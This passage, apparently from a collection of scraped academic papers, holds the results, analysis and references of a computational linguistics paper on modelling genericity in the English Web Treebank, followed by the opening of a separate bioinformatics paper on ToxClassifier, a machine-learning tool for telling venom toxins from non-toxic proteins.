1998) supersenses (Ciaramita and Johnson, 2003) for all WordNet senses the root argument or predicate lemmas can have. And we consider two sets of token-level hand- engineered features. 1. Syntactic features POS tags, UD morpho- logical features, and governing dependencies were extracted using PredPatt for the predi- cate/argument root and all of its dependents. 2. Lexical features Function words (determin- ers, modals, auxiliaries) in the dependents of the arguments and predicates. Learned features For our type-level learned features, we use the 42B uncased GloVe embed- dings for the root of the annotated predicate or argument (Pennington et al., 2014). For our token- level learned features, we use 1,024-dimensional ELMo embeddings (Peters et al., 2018). To obtain the latter, the UD-EWT sentences are passed as input to the ELMo three-layered biLM, and we extract the output of all three hidden layers for the root of the annotated predicates and arguments, giving us 3,072-dimensional vectors for each. Labeling models For each protocol, we predict the three normalized properties corresponding to the annotated token(s) using different subsets of the above features. The feature representation is used as the input to a multilayer perceptron with ReLU nonlinearity and L1 loss. The number of hidden layers and their sizes are hyperparameters that we tune on the development set. Implementation For all experiments, we use stochastic gradient descent to train the multilayer perceptron parameters with the Adam optimizer (Kingma and Ba, 2015), using the default learning rate in pytorch (10−3). We performed ablation experiments on the four major classes of features discussed above. Hyperparameters For each of the ablation ex- periments, we ran a hyperparameter grid search over hidden layer sizes (one or two hidden layers with sizes h1, h2 ∈ {512, 256, 128, 64, 32}; h2 at most half of h1), L2 regularization penalty l ∈ { 0, 10−5, 10−4, 10−3 } , and the dropout probability d ∈ {0.1, 0.2, 0.3, 0.4, 0.5}. Development For all models, we train for at most 20 epochs with early stopping. At the end of each epoch, the L1 loss is calculated on the development set, and if it is higher than the pre- vious epoch, we stop training, saving the param- eter values from the previous epoch. Evaluation Consonant with work in event fac- tuality prediction, we report Pearson correlation (ρ) and proportion of mean absolute error (MAE) explained by the model, which we refer to as R1 on analogy with the variance explained R2 = ρ2. R1 = 1 − MAEpmodel MAEpbaseline where MAEpbaseline is always guessing the median for property p. We calculate R1 across properties (wR1) by taking the mean R1 weighted by the MAE for each property. These metrics together are useful, because ρ tells us how similar the predictions are to the true values, ignoring scale, and R1 tells us how close the predictions are to the true values, after accounting for variability in the data. We focus mainly on differences in relative performance among our models, but for comparison, state- of-the-art event factuality prediction systems obtain ρ ≈ 0.77 and R1 ≈ 0.57 for predicting event factuality on the predicates we annotate (Rudinger et al., 2018). 9 Results Table 5 contains the results on the test set for both the argument (top) and predicate (bottom) protocols. We see that (i) our models are generally better able to predict referential properties of arguments than those of predicates; (ii) for both predicates and arguments, contextual learned repre- sentations contain most of the relevant information for both arguments and predicates, though the addition of hand-engineered features can give a slight performance boost, particularly for the predicate properties; and (iii) the proportion of absolute error explained is significantly lower than what we might expect from the variance explained implied by the correlations. We discuss (i) and (ii) here, deferring discussion of (iii) to §10. 510 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 Feature sets Is.Particular Is.Kind Is.Abstract All Type Token GloVe ELMO ρ R1 ρ R1 ρ R1 wR1 A R G U M E N T + − − − 42.4 7.4 30.2 4.9 51.4 11.7 8.1 − + − − 50.6 13.0 41.5 8.8 33.8 4.8 8.7 − − + − 44.5 8.3 33.4 4.6 45.2 7.7 6.9 − − − + 57.5 17.0 48.1 13.3 55.7 14.9 15.1 + + − − 55.3 14.1 46.2 11.6 52.6 13.0 12.9 − + − + 58.6 15.6 48.6 13.7 56.8 14.2 14.5 + + − + 58.3 16.3 47.8 13.2 56.3 15.2 14.9 + + + + 58.1 17.0 48.9 13.2 56.1 15.1 15.1 Is.Particular Is.Hypothetical Is.Dynamic P R E D IC A T E + − − − 14.0 0.8 13.4 0.0 32.5 5.6 2.0 − + − − 22.3 2.8 37.7 7.3 31.7 5.1 5.1 − − + − 20.6 2.2 23.4 2.4 29.7 4.6 3.0 − − − + 26.2 3.6 43.1 10.0 37.0 6.8 6.8 − − + + 26.8 4.0 42.8 8.9 37.3 7.3 6.7 + + − − 24.0 3.3 37.9 7.6 37.1 7.6 6.1 − + − + 27.4 4.1 43.3 10.1 38.6 7.8 7.4 + − − + 27.1 4.0 43.0 10.1 37.5 7.6 7.2 + + + + 26.8 4.1 43.5 10.3 37.1 7.2 7.2 Table 5: Correlation (ρ) and MAE explained (R1) on test split for argument (top) and predicate (bottom) protocols. Bolded numbers give the best result in the column; the models highlighted in blue are the ones analyzed in §10. Argument properties While type-level hand- engineered and learned features perform relatively poorly for properties such as IS.PARTICULAR and IS.KIND for arguments, they are able to predict IS.ABSTRACT relatively well compared to the models with all features. The converse of this also holds: Token-level hand-engineered features are better able to predict IS.PARTICULAR and IS.KIND, but perform relatively poorly on their own for IS.ABSTRACT. This seems likely to be a product of abstract reference being fairly strongly associated with particular lexical items, while most arguments can refer to particulars and kinds (and which they refer to is context-dependent). And in light of the relatively good performance of contextual learned features alone, it suggests that these contextual learned features—in contrast to the hand-engineered token-level features—are able to use this information coming from the lexical item. Interestingly, however, the models with both contextual learned features (ELMo) and hand- engineered token-level features perform slightly better than those without the hand-engineered features across the board, suggesting that there is some (small) amount of contextual information relevant to generalization that the contextual learned features are missing. This performance boost may be diminished by improved contextual encoders, such as BERT (Devlin et al., 2019). Predicate properties We see a pattern similar to the one observed for the argument properties mirrored in the predicate properties: Whereas type-level hand-engineered and learned features perform relatively poorly for properties such as IS.PARTICULAR and IS.HYPOTHETICAL, they are able to predict IS.DYNAMIC relatively well compared with the models with all features. The converse of this also holds: Token-level hand-engineered features are better able to predict IS.PARTICULAR and IS.HYPOTHETICAL, but perform relatively poorly on their own for IS.DYNAMIC. One caveat here is that, unlike for IS.ABSTRACT, type-level learned features (GloVe) alone perform quite poorly for IS.DYNAMIC, and the difference between the models with only type-level hand- engineered features and the ones with only token-level hand-engineered features is less stark for IS.DYNAMIC than for IS.ABSTRACT. This may suggest that, though IS.DYNAMIC is relatively con- strained by the lexical item, it may be more contextually determined than IS.ABSTRACT. Another 511 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 Figure 4: True (normalized) property values for argument (top) and predicate (bottom) protocols in the development set plotted against values predicted by models highlighted in blue in Table 5. major difference between the argument prop- erties and the predicate properties is that IS.PARTICULAR is much more difficult to predict than IS.HYPOTHETICAL. This contrasts with IS.PARTICULAR for arguments, which is easier to predict than IS.KIND. 10 Analysis Figure 4 plots the true (normalized) property val- ues for the argument (top) and predicate (bottom) protocols from the development set against the values predicted by the models highlighted in blue in Table 5. Points are colored by the part-of-speech of the argument or predicate root. We see two overarching patterns. First, our models are generally reluctant to predict values outside the [−1, 1] range, despite the fact that there are not an insignificant number of true values outside this range. This behavior likely contributes to the difference we saw between the ρ and R1 metrics, wherein R1 was generally worse than we would expect from ρ. This pattern is starkest for IS.PARTICULAR in the predicate protocol, where predictions are nearly all constrained to [0, 1]. Second, the model appears to be heavily reliant on part-of-speech information—or some semantic information related to part-of-speech—for making predictions. This behavior can be seen in the fact that, though common noun-rooted arguments get relatively variable predictions, pronoun- and proper noun-rooted arguments are almost always predicted to be particular, non-kind, non-abstract; and though verb-rooted predicates also get rela- tively variable predictions, common noun-, adjective-, and proper noun-rooted predicates are almost always predicted to be non-dynamic. Argument protocol Proper nouns tend to refer to particular, non-kind, non-abstract entities, but they can be kind-referring, which our models miss: iPhone in (20) and Marines in (19) were predicted to have low kind score and high particular score, while annotators label these arguments as non-particular and kind-referring. (19) The US Marines took most of Fallujah Wednesday, but still face[...] (20) I’m writing an essay...and I need to know if the iPhone was the first Smart Phone. 512 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 This similarly holds for pronouns. As men- tioned in §6, we filtered out several pronominal arguments, but certain pronouns—like you, they, yourself, themselves—were not filtered because they can have both particular- and kind-referring uses. Our models fail to capture instances where pronouns are labeled kind-referring (e.g., you in (21) and (22)) consistently predicting low IS.KIND scores, likely because they are rare in our data. (21) I like Hayes Street Grill....another plus, it’s right by Civic Center, so you can take a romantic walk around the Opera House, City Hall, Symphony Auditorium[...] (22) What would happen if you flew the flag of South Vietnam in Modern day Vietnam? This behavior is not seen with common nouns: The model correctly predicts common nouns in certain contexts as non-particular, non-abstract, and kind-referring (e.g., food in (23) and men in (24)). (23) Kitchen puts out good food[...] (24) just saying most men suck! Predicate protocol As in the argument protocol, general trends associated with part-of-speech are exaggerated by the model. We noted in §7 that annotators tend to annotate hypothetical predicates as non-particular and vice-versa (ρ= −0.25), but the model’s predictions are anti-correlated to a much greater extent (ρ = −0.79). For example, annotators are more willing to say a predicate can refer to particular, hypothetical situations (25) or a non-particular, non-hypothetical situation (26). (25) Read the entire article[...] (26) it s illegal to sell stolen property, even if you don’t know its stolen. The model also had a bias towards partic- ular predicates referring to dynamic predicates (ρ = 0.34)—a correlation not present among annotators. For instance, is closed in (27) was annotated as particular but non-dynamic but predicted by the model to be particular and dy- namic; and helped in (28) was annotated as non- particular and dynamic, but the model predicted particular and dynamic. (27) library is closed. (28) I have a new born daughter and she helped me with a lot. 11 Conclusion We have proposed a novel semantic framework for modeling linguistic expressions of generalization as combinations of simple, real-valued referential properties of predicates and their arguments. We used this framework to construct a dataset covering the entirety of the Universal Depen- dencies English Web Treebank and probed the ability of both hand-engineered and learned type- and token-level features to predict the annotations in this dataset. Acknowledgments We would like to thank three anonymous re- viewers and Chris Potts for useful comments on this paper as well as Scott Grimm and the FACTS.lab at the University of Rochester for use- ful comments on the framework and protocol design. This research was supported by the Univer- sity of Rochester, JHU HLTCOE, and DARPA AIDA. The U.S. Government is authorized to re- produce and distribute reprints for Governmental purposes. The views and conclusions contained in this publication are those of the authors and should not be interpreted as representing official policies or endorsements of DARPA or the U.S. Government. References Lasha Abzianidze and Johan Bos. 2017. Towards universal semantic tagging. In IWCS 2017, 12th International Conference on Computational Semantics, Short papers. Alan Agresti. 2003. Categorical Data Analysis, 482. John Wiley & Sons. R.H. Baayen. 2008. Analyzing Linguistic Data: A Practical Introduction to Statistics using R. Cambridge University Press. Collin F. Baker, Charles J. Fillmore, and John B. Lowe. 1998. The Berkeley FrameNet Proj- ect. In Proceedings of the 36th Annual Meeting of the Association for Computational Linguistics and 17th International Conference on Computational Linguistics - Volume 1, pages 86–90, Montreal. Lisa Bauer, Yicheng Wang, and Mohit Bansal. 2018. Commonsense for generative multi- hop question answering tasks. In Proceedings 513 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 of the 2018 Conference on Empirical Methods in Natural Language Processing, pages 4220–4230, Brussels. Cosmin Adrian Bejan and Sanda Harabagiu. 2010. Unsupervised event coreference resolution with rich linguistic features. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 1412–1422, Uppsala. Ann Bies, Justin Mott, Colin Warner, and Seth Kulick. 2012. English Web Treebank LDC2012T13. Linguistic Data Consortium, Philadelphia, PA. Marc Brysbaert, Amy Beth Warriner, and Victor Kuperman. 2014. Concreteness ratings for 40 thousand generally known English word lemmas. Behavior Research Methods, 46(3):904–911. Greg Carlson, Rachel Sussman, Natalie Klein, and Michael Tanenhaus. 2006. Weak definite noun phrases. In Proceedings of NELS 36, pages 179–196, Amherst, MA. Greg N. Carlson. 1977. Reference to Kinds in English. Ph.D. thesis, University of Massachusetts, Amherst. Gregory Carlson. 2011. Genericity, In (Maienborn et al., 2011), 1153–1185. Gregory N. Carlson and Francis Jeffry Pelletier. 1995. The Generic Book, The University of Chicago Press. Massimiliano Ciaramita and Mark Johnson. 2003. Supersense tagging of unknown nouns in WordNet. In Proceedings of the 2003 Con- ference on Empirical Methods in Natural Language Processing, pages 168–175. Agata Cybulska and Piek Vossen. 2014a. Guidelines for ECB+ annotation of events and their coreference. Technical Report NWR- 2014-1, VU University Amsterdam. Agata Cybulska and Piek Vossen. 2014b. Using a sledgehammer to crack a nut? Lexical diversity and event coreference resolution. In Proceedings of the Ninth International Con- ference on Language Resources and Evaluation (LREC’14), Reykjavik. Marie-Catherine De Marneffe, Timothy Dozat, Natalia Silveira, Katri Haverinen, Filip Ginter, Joakim Nivre, and Christopher D. Manning. 2014. Universal Stanford dependencies: A cross-linguistic typology. In Proceedings of the Ninth International Conference on Language Resources and Evaluation (LREC’14), pages 4585–4592, Reykjavik. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. 2019. BERT: Pre-training of deep bidirectional transformers for language understanding. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers), pages 4171–4186, Minneapolis, MN. George R. Doddington, Alexis Mitchell, Mark A. Przybocki, Lance A. Ramshaw, Stephanie Strassel, and Ralph M. Weischedel. 2004. The Automatic Content Extraction (ACE) program—Tasks, data, and evaluation. In Pro- ceedings of the Fourth International Con- ference on Language Resources and Evaluation (LREC’04), Lisbon. Bonnie J. Dorr. 2001. LCS Database. University of Maryland. David Dowty. 1991. Thematic proto-roles and argument selection. Language, 67(3):547–619. Christiane Fellbaum. 1998. WordNet: An Electronic Lexical Database, MIT Press, Cambridge, MA. Annemarie Friedrich and Alexis Palmer. 2014a. Automatic prediction of aspectual class of verbs in context. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), pages 517–523, Baltimore, MD. Annemarie Friedrich and Alexis Palmer. 2014b. Situation entity annotation. In Proceedings of LAW VIII - The 8th Linguistic Annotation Workshop, pages 149–158, Dublin. Annemarie Friedrich, Alexis Palmer, Melissa Peate Sørensen, and Manfred Pinkal. 2015. Annotating genericity: A survey, a scheme, and a corpus. In Proceedings of The 9th Linguistic Annotation Workshop, pages 21–30, Denver, CO. 514 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 Annemarie Friedrich, Alexis Palmer, and Manfred Pinkal. 2016. Situation entity types: Automatic classification of clause-level aspect. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 1757–1768, Berlin. Annemarie Friedrich and Manfred Pinkal. 2015a. Automatic recognition of habituals: A three- way classification of clausal aspect. In Pro- ceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 2471–2481, Lisbon. Annemarie Friedrich and Manfred Pinkal. 2015b. Discourse-sensitive automatic identification of generic expressions. In Proceedings of the 53rd Annual Meeting of the Association for Compu- tational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Papers), pages 1272–1281, Beijing. Andrew Gelman and Jennifer Hill. 2014. Data Analysis using Regression and Multilevel- Hierarchical Models. Cambridge University Press, New York City. Scott Grimm. 2014. Individuating the abstract. In Proceedings of Sinn und Bedeutung 18, pages 182–200, Bayonne and Vitoria-Gasteiz. Scott Grimm. 2016. Crime investigations: The countability profile of a delinquent noun. Baltic International Yearbook of Cognition, Logic and Communication, 11. doi:10.4148/1944- 3676.1111. Scott Grimm. 2018. Grammatical number and the scale of individuation. Language, 94(3): 527–574. Jerry R. Hobbs, William Croft, Todd Davies, Douglas Edwards, and Kenneth Laws, 1987. Commonsense metaphysics and lexical seman- tics. Computational Linguistics, 13(3-4):241–250. Nancy Ide, Christiane Fellbaum, Collin Baker, and Rebecca Passonneau. 2010. The manually annotated sub-corpus: A community resource for and by the people. In Proceedings of the ACL 2010 Conference Short Papers, pages 68–73, Uppsala. Diederik P. Kingma and Jimmy Ba. 2015. Adam: A method for stochastic optimization. In Proceedings of 3rd International Conference on Learning Representations (ICLR 2015), San Diego, CA. Heeyoung Lee, Marta Recasens, Angel Chang, Mihai Surdeanu, and Dan Jurafsky. 2012. Joint entity and event coreference resolution across documents. In Proceedings of the 2012 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning, pages 489–500, Jeju Island. Kenton Lee, Yoav Artzi, Yejin Choi, and Luke Zettlemoyer. 2015. Event detection and factuality assessment with non-expert supervi- sion. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 1643–1648, Lisbon. Sarah-Jane Leslie and Adam Lerner. 2016. Generic generalizations, Edward N. Zalta, editor, The Stanford Encyclopedia of Phil- osophy, Winter 2016 edition. Metaphysics Research Lab, Stanford University. Annie Louis and Ani Nenkova. 2011. Automatic identification of general and specific sentences by leveraging discourse annotations. In Proceed- ings of 5th International Joint Conference on Natural Language Processing, pages 605–613, Chiang Mai. Claudia Maienborn, Klaus von Heusinger, and Paul Portner, editors. 2011. Semantics: An International Handbook of Natural Language Meaning, volume 2. Mouton de Gruyter, Berlin. Thomas A. Mathew. 2009. Supervised catego- rization of habitual versus episodic sentences. Master’s thesis, Georgetown University. John McCarthy. 1960. Programs with Common Sense, RLE and MIT Computation Center. John McCarthy. 1980. Circumscription—A form of nonmonotonic reasoning. Artificial Intelli- gence, 13(1–2):27–39. John McCarthy. 1986. Applications of cir- cumscription to formalizing common sense knowledge. Artificial Intelligence, 28:89–116. 515 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 Marvin Minsky. 1974. A framework for represent- ing knowledge. MIT-AI Laboratory Memo 306. Alexis Mitchell, Stephanie Strassel, Mark Przybocki, J. K. Davis, George Doddington, Ralph Grishman, Adam Meyers, Ada Brunstein, Lisa Ferro, and Beth Sundheim. 2003. ACE- 2 Version 1.0 LDC2003T11. Linguistic Data Consortium, Philadelphia, PA. Joakim Nivre, Zeljko Agic, Maria Jesus Aranzabe, Masayuki Asahara, Aitziber Atutxa, Miguel Ballesteros, John Bauer, Kepa Bengoetxea, Riyaz Ahmad Bhat, Cristina Bosco, Sam Bowman, Giuseppe G. A. Celano, Miriam Connor, Marie- Catherine de Marneffe, Arantza Diaz de Ilarraza, Kaja Dobrovoljc, Timothy Dozat, Tomaž Erjavec, Richárd Farkas, Jennifer Foster, Daniel Galbraith, Filip Ginter, Iakes Goenaga, Koldo Gojenola, Yoav Goldberg, Berta Gonzales, Bruno Guillaume, Jan Hajič, Dag Haug, Radu Ion, Elena Irimia, Anders Johannsen, Hiroshi Kanayama, Jenna Kanerva, Simon Krek, Veronika Laippala, Alessandro Lenci, Nikola Ljubešić, Teresa Lynn, Christopher Manning, Cătălina Mărănduc, David Mareček, Héctor Martı́nez Alonso, Jan Mašek, Yuji Matsumoto, Ryan McDonald, Anna Missilä, Verginica Mititelu, Yusuke Miyao, Simonetta Montemagni, Shunsuke Mori, Hanna Nurmi, Petya Osenova, Lilja Øvrelid, Elena Pascual, Marco Passarotti, Cenel- Augusto Perez, Slav Petrov, Jussi Piitulainen, Barbara Plank, Martin Popel, Prokopis Prokopidis, Sampo Pyysalo, Loganathan Ramasamy, Rudolf Rosa, Shadi Saleh, Sebastian Schuster, Wolfgang Seeker, Mojgan Seraji, Natalia Silveira, Maria Simi, Radu Simionescu, Katalin Simkó, Kiril Simov, Aaron Smith, Jan Štěpánek, Alane Suhr, Zsolt Szántó, Takaaki Tanaka, Reut Tsarfaty, Sumire Uematsu, Larraitz Uria, Viktor Varga, Veronika Vincze, Zdeněk Žabokrtský, Daniel Zeman, Hanzhi Zhu. 2015. Universal Dependencies 1.2. LINDAT/CLARIN digital library at the Institute of Formal and Applied Linguistics (ÚFAL), Faculty of Mathematics and Physics, Charles University. Tim O’Gorman, Kristin Wright-Bettner, and Martha Palmer. 2016. Richer event description: Integrating event coreference with temporal, causal and bridging annotation. In Proceedings of the 2nd Workshop on Computing News Storylines (CNS 2016), pages 47–56, Austin, TX. Jeffrey Pennington, Richard Socher, and Christopher D. Manning. 2014. GloVe: Global vectors for word representation. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 1532–1543, Doha. Matthew Peters, Mark Neumann, Mohit Iyyer, Matt Gardner, Christopher Clark, Kenton Lee, and Luke Zettlemoyer. 2018. Deep con- textualized word representations. In Proceed- ings of the 2018 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long Papers), pages 2227–2237, New Orleans, LA. Massimo Poesio. 2004. Discourse annotation and semantic annotation in the GNOME corpus. In Proceedings of the 2004 ACL Workshop on Discourse Annotation, pages 72–79, Barcelona. Massimo Poesio, Yulia Grishina, Varada Kolhatkar, Nafise Moosavi, Ina Roesiger, Adam Roussel, Fabian Simonjetz, Alexandra Uma, Olga Uryupina, Juntao Yu, and Heike Zinsmeister. 2018. Anaphora resolution with the ARRAU corpus. In Proceedings of the First Workshop on Computational Models of Reference, Anaphora and Coreference, pages 11–22, New Orleans, LA. James Pustejovsky, Patrick Hanks, Roser Sauri, Andrew See, Robert Gaizauskas, Andrea Setzer, Dragomir Radev, Beth Sundheim, David Day, Lisa Ferro, and Marcia Lazo. 2003. The TIMEBANK corpus. In Proceedings of Corpus Linguistics, pages 647–656, Lancaster. Drew Reisinger, Rachel Rudinger, Francis Ferraro, Craig Harman, Kyle Rawlins, and Benjamin Van Durme. 2015. Semantic proto- roles. Transactions of the Association for Computational Linguistics, 3:475–488. Nils Reiter and Anette Frank. 2010. Identifying generic noun phrases. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 40–49, Uppsala. 516 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 Raymond Reiter. 1987. Nonmonotonic reasoning, In J. F. Traub, N. J. Nilsson, and B. J. Grosz, editors, Annual Review of Computer Science, volume 2, pages 147–186. Annual Reviews Inc. Rachel Rudinger, Aaron Steven White, and Benjamin Van Durme. 2018. Neural models of factuality. In Proceedings of the 2018 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long Papers), pages 731–744, New Orleans, LA. Roger C. Schank and Robert P. Abelson. 1975. Scripts, plans, and knowledge. In Proceedings of the 4th International Joint Conference on Artificial Intelligence - Volume 1, pages 151–157. Karin Kipper Schuler. 2005. VerbNet: A broad- coverage, comprehensive verb lexicon. Ph.D. thesis, Computer and Information Science Department, Universiy of Pennsylvania. Natalia Silveira, Timothy Dozat, Marie-Catherine de Marneffe, Samuel Bowman, Miriam Connor, John Bauer, and Chris Manning. 2014. A gold standard dependency corpus for English. In Proceedings of the Ninth International Conference on Language Resources and Eval- uation (LREC’14). Gabriel Stanovsky, Judith Eckle-Kohler, Yevgeniy Puzikov, Ido Dagan, and Iryna Gurevych. 2017. Integrating deep linguistic fea- tures in factuality prediction over unified data- sets. In Proceedings of the 55th Annual Meeting of the Association for Computational Linguis- tics (Volume 2: Short Papers), pages 352–357, Vancouver. Siddharth Vashishtha, Benjamin Van Durme, and Aaron Steven White. 2019. Fine-grained temporal relation extraction. arXiv, cs.CL/ 1902.01390v2. Zeno Vendler. 1957. Verbs and times. Philo- sophical Review, 66(2):143–160. Christopher Walker, Stephanie Strassel, Julie Medero, and Kazuaki Maeda. 2006. ACE 2005 multilingual training corpus LDC2006T06. Linguistic Data Consortium, Philadelphia, PA. Aaron Steven White, Kyle Rawlins, and Benjamin Van Durme. 2017. The semantic proto-role linking model. In Proceedings of the 15th Conference of the European Chapter of the Association for Computational Linguistics, volume 2, pages 92–98, Valencia. Aaron Steven White, Drew Reisinger, Keisuke Sakaguchi, Tim Vieira, Sheng Zhang, Rachel Rudinger, Kyle Rawlins, and Benjamin Van Durme. 2016. Universal decompositional semantics on universal dependencies. In Pro- ceedings of the 2016 Conference on Empirical Methods in Natural Language Processing, pages 1713–1723, Austin, TX. Sheng Zhang, Rachel Rudinger, Kevin Duh, and Benjamin Van Durme. 2017a. Ordinal common-sense inference. Transactions of the Association for Computational Linguistics, 5:379–395. Sheng Zhang, Rachel Rudinger, and Benjamin Van Durme. 2017b. An evaluation of PredPatt and Open IE via stage 1 semantic role labeling. In IWCS 2017, 12th International Conference on Computational Semantics, Short papers, Montpellier. 517 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00285 by Carnegie Mellon University user on 06 April 2021 Introduction Background Annotation Framework Framework Validation Comparison to Standard Ontology Bulk Annotation Exploratory Analysis Models Results Analysis Conclusion work_qe6lb6u4rfcq3faeborafelgze ---- Submitted 24 June 2016 Accepted 8 September 2016 Published 10 October 2016 Corresponding author Paul F. Long, paul.long@kcl.ac.uk Academic editor Jaume Bacardit Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.90 Copyright 2016 Gacesa et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Machine learning can differentiate venom toxins from other proteins having non-toxic physiological functions Ranko Gacesa1, David J. Barlow1 and Paul F. Long1,2,3,4 1 Institute of Pharmaceutical Science, King’s College London, London, United Kingdom 2 Department of Chemistry, King’s College London, London, United Kingdom 3 Brazil Institute, King’s College London, London, United Kingdom 4 Faculdade de Ciências Farmacêuticas, Universidade de São Paulo, São Paulo, Brazil ABSTRACT Ascribing function to sequence in the absence of biological data is an ongoing challenge in bioinformatics. Differentiating the toxins of venomous animals from homologues having other physiological functions is particularly problematic as there are no universally accepted methods by which to attribute toxin function using sequence data alone. Bioinformatics tools that do exist are difficult to implement for researchers with little bioinformatics training. Here we announce a machine learning tool called ‘ToxClassifier’ that enables simple and consistent discrimination of toxins from non-toxin sequences with >99% accuracy and compare it to commonly used toxin annotation methods. ‘ToxClassifer’ also reports the best-hit annotation allowing placement of a toxin into the most appropriate toxin protein family, or relates it to a non-toxic protein having the closest homology, giving enhanced curation of existing biological databases and new venomics projects. ‘ToxClassifier’ is available for free, either to download (https://github.com/rgacesa/ToxClassifier) or to use on a web-based server (http://bioserv7.bioinfo.pbf.hr/ToxClassifier/). Subjects Bioinformatics, Computational Biology, Data Mining and Machine Learning Keywords Protein sequences, Biological function, Animal venom, Automatic annotation, Functional prediction INTRODUCTION Falling costs of tandem mass spectrometry for shotgun proteomics have made generating vast amounts of protein sequence data increasingly affordable, yet the gap between obtaining these sequences and then assigning biological function to them continues to widen (Bromberg et al., 2009). Often, most sequences are deposited into protein databases with little, if any, accompanying experimental data from which biological functions can be inferred. Customarily, biological function is deduced indirectly by comparing amino acid sequence similarity to other proteins in large databases to calculate a ranking of proteins with respect to the query sequence. Using simple pair-wise comparisons as a sequence searching procedure, the BLAST suite of programs (for example, BLASTp) was first of its kind and has gained almost unprecedented acceptance among scientists (Neumann, Kumar & Shalchian-Tabrizi, 2014). Variations of the BLAST algorithm (for instance, PSI- BLAST (Altschul et al., 1997)) and development of probabilistic models (such as hidden How to cite this article Gacesa et al. (2016), Machine learning can differentiate venom toxins from other proteins having non-toxic physiological functions. PeerJ Comput. Sci. 2:e90; DOI 10.7717/peerj-cs.90 https://peerj.com mailto:paul.long@kcl.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.90 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://github.com/rgacesa/ToxClassifier http://bioserv7.bioinfo.pbf.hr/ToxClassifier/ http://dx.doi.org/10.7717/peerj-cs.90 Markov models, HMMs (Krogh et al., 1994)) use multiple sequence alignments to detect conserved sequences (also referred to as motifs). Use of these models enables detection of remote homology between proteins seemingly unrelated when analysed by pairwise alignment alone (Krogh et al., 1994). Conversely, development of accurate algorithms and fast software tools that can automatically identify critical amino acid residues responsible for differences in protein function amongst sequences having exceptionally high sequence similarity remains a challenging problem for bioinformatics. In a post-genomic era, the toxins of venomous animals are an emerging paradigm. Animal venoms comprise predominantly toxic peptides and proteins. Duplication of genes that formerly encoded peptides and proteins having non-toxic physiological functions is one of the foremost evolutionary drivers that gives rise to the enormous functional diversity seen in animal venom toxins (Fry, 2005; Chang & Duda, 2012). However, evidence is ambiguous as to whether these genes were expressed in multiple body tissues, with the duplicate copy then recruited into venom glands with subsequent neo-functionalisation to develop toxicity, or if there was duplication with ensuing sub-functionalisation of genes encoding pre-existing but non-toxic venom gland proteins (Hargreaves et al., 2014). Examples of both mechanisms have been demonstrated in different venomous animals (Reyes-Velasco et al., 2015; Vonk et al., 2013; Junqueira de Azevedo et al., 2015). Nonetheless, many toxin proteins that constitute venoms share a remarkable similarity to other proteins with non-toxic physiological functions, and deciphering sequence data to disentangle these functions is not a trivial task (Kaas & Craik, 2015). Previous proteomic data from our laboratory and subsequent results of others realised an astonishingly high sequence similarity between cnidarian (jellyfish, coral, sea anemones etc.) toxins and those of other higher venomous animals (Weston et al., 2012; Weston et al., 2013; Li et al., 2012; Li et al., 2014). This suggested to us that a small number of sequences, when occurring in combination, might explain this similarity and prompted the search for toxin-specific motifs (Starcevic & Long, 2013). An unsupervised procedure was developed that resulted in the identification of motifs we called ‘tox-bits’, and which could describe most toxins as combinations of between 2–3 ‘tox-bits’ (Starcevic et al., 2015). The ‘tox-bits’ are defined as HMM-profiles and were found to be superior at differentiating toxin from non-toxin sequences, when compared against standard BLAST or HMM based methods (Starcevic et al., 2015). However, implementation of ‘tox-bits’ HMM profiles is not straightforward for scientists with little or no bioinformatics experience. Hence, in this paper we introduce and make freely available an easy-to-use machine learning tool called the ‘ToxClassifier’ that employs ‘tox-bits’ HMM profiles and other standard classifier tools running in parallel to distinguish toxins from their non-toxic homologues. METHODS Datasets Data for training and testing of machine learning classifiers used in ToxClassifier ensemble was obtained from UniProtKB database (Bateman et al., 2015), according to the following methodology: Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 2/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90 (1) ‘Positive’ dataset representing well annotated putative animal toxins was downloaded from UniProtKB/SwissProt-ToxProt (Jungo et al., 2012). Database was searched for animal toxins and venoms, using search query: taxonomy: ‘‘Metazoa [33208]’’ (keyword:toxin OR annotation:(type: ‘‘tissue specificity’’ venom)). All duplicate entries with identical sequence or sequence identifier were removed, resulting in 8,093 sequences. (2) ‘Easy’ negative dataset representative of physiological proteins was obtained by random sampling of 50,000 sequences in 